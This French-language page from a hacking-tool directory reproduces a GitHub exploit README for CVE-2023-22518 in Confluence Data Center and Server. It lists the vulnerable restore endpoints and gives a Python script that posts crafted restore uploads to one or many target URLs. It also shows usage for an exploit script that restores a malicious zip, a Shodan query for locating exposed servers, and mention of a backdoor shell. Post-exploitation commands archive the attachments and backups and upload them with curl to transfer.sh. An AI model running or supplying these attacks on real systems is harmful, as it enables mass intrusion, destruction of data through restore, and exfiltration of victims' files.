Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-22518 — Vulnérabilité d'autorisation inappropriée dans le centre de données Confluence et le serveur + bugsBonus 🔥 | Kitploit
Outils/GitHubGitHub/bibo318/cve-2023-22518
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsPost-ExploitationTests d'Intrusion
GitHubbibo318/cve-2023-22518

CVE-2023-22518

Vulnérabilité d'autorisation inappropriée dans le centre de données Confluence et le serveur + bugsBonus 🔥

Voir le dépôt
11il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-22518

Vulnérabilité d'autorisation incorrecte dans Confluence Data Center et Server.

Atlassian a averti les administrateurs d'une vulnérabilité critique dans Confluence. L'exploitation de cette vulnérabilité pourrait entraîner une perte de données, c'est pourquoi le développeur recommande d'installer le correctif immédiatement.

Il est à noter que la vulnérabilité ne peut pas être utilisée pour divulguer des données et n'affecte pas les sites Atlassian Cloud accessibles via le domaine atlassian.net.

Informations détaillées sur la vulnérabilité

Page Jira Atlassian

ProduitVersion affectéeVersion corrigée
Confluence Data CenterToutes les versions sont affectées7.19.16 et ultérieures
Confluence Server8.3.4 et ultérieures
8.4.4 et ultérieures
8.5.3 et ultérieures
8.6.1 et ultérieures

Exploitation

Type: Autorisation incorrecte

CWE: CWE-285 / CWE-266

ATT&CK: T1548.002

Vecteurs d'attaque connus 🔥

/json/setup-restore.action

/json/setup-restore-local.action

/json/setup-restore-progress.action

/server-info.action Forum

Exemple simple de test de vulnérabilité en Python

root@kitploit:~
import requests
import random
import string
import argparse
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def random_string(length=10):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))

def post_setup_restore(baseurl):
    paths = ["/json/setup-restore.action", "/json/setup-restore-local.action", "/json/setup-restore-progress.action", "/server-info.action"]
    for path in paths:
        url = f"{baseurl.rstrip('/')}{path}"

        headers = {
            "X-Atlassian-Token": "no-check",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7"
        }

        rand_str = random_string()
        data = (
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            "Content-Disposition: form-data; name=\"buildIndex\"\r\n\r\n"
            "true\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            f"Content-Disposition: form-data; name=\"file\";filename=\"{rand_str}.zip\"\r\n\r\n"
            f"{rand_str}\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
            "Content-Disposition: form-data; name=\"edit\"\r\n\r\n"
            "Upload and import\r\n"
            "------WebKitFormBoundaryT3yekvo0rGaL9QR7--\r\n"
        )

        try:
            response = requests.post(url, headers=headers, data=data.encode('utf-8'), timeout=10, verify=False)

            if (response.status_code == 200 and
                'The zip file did not contain an entry' in response.text and 
                'exportDescriptor.properties' in response.text):
                print(f"[+] Vulnerable to CVE-2023-22518 on host {url}!")
            else:
                print(f"[-] Not vulnerable to CVE-2023-22518 for host {url}.")
        except requests.RequestException as e:
            print(f"[*] Error connecting to {url}. Error: {e}")

def main():
    parser = argparse.ArgumentParser(description="Post setup restore script")
    parser.add_argument('--url', help='The URL to target', required=False)
    parser.add_argument('--file', help='Filename containing a list of URLs', required=False)
    args = parser.parse_args()

    if args.url:
        post_setup_restore(args.url)
    elif args.file:
        with open(args.file, 'r') as f:
            for line in f:
                url = line.strip()
                if url:
                    post_setup_restore(url)
    else:
        print("You must provide either --url or --file argument.")

if __name__ == "__main__":
    main()

Utilisation du script d'exploitation 🔥

exploit.py

root@kitploit:~
pip install pycryptodome
python3 exploit.py
Nhập URL: http://domain/json/setup-restore.action?synchronous=true
Nhập đường dẫn tới file .zip: /path/xmlexport-20231109-060519-1.zip

BugsBonus 🔥

Recherche Shodan:

root@kitploit:~
http.favicon.hash:-305179312

exploit-restore.zip

Application Confluence Backdoor Shell

Lors de la restauration de Confluence à l'aide de cette vulnérabilité, le répertoire %CONFLUENCE_HOME%/attachments reste rempli de fichiers, pouvant atteindre des milliers. Leur extraction est assez simple, et leur extension peut être déterminée avec la commande file de Linux. Exemple:

root@kitploit:~
file /var/lib/confluence/attachments/v4/191/28/77273124/77273124.1
/var/lib/confluence/attachments/v4/191/28/77273124/77273124.1: PNG image data, 442 x 170, 8-bit/color RGBA, non-interlaced

Hoặc

file /var/atlassian/application-data/confluence/attachments/v4/114/128/3506237/3506237.1
/var/atlassian/application-data/confluence/attachments/v4/114/128/3506237/3506237.1: PNG image data, 1250 x 674, 8-bit/color RGBA, non-interlaced

Exemple de sauvegarde simple d'un répertoire et extraction de l'archive:

root@kitploit:~
tar -czvf /var/atlassian/application-data/confluence/attachments_backup.tar.gz /var/atlassian/application-data/confluence/attachments
curl --upload-file /var/atlassian/application-data/attachments_backup.tar.gz https://transfer.sh/attachments_backup.tar.gz
https://transfer.sh/***********/attachments_backup.tar.gz

or

curl --upload-file /var/atlassian/application-data/confluence/backups/backup-2023_09_26.zip https://transfer.sh/backup-2023_09_26.zip
https://transfer.sh/***********/backup-2023_09_26.zip

Article sur la nouvelle porte dérobée persistant même après le correctif de la vulnérabilité critique de Confluence

Autres informations utiles

Télécharger l’outil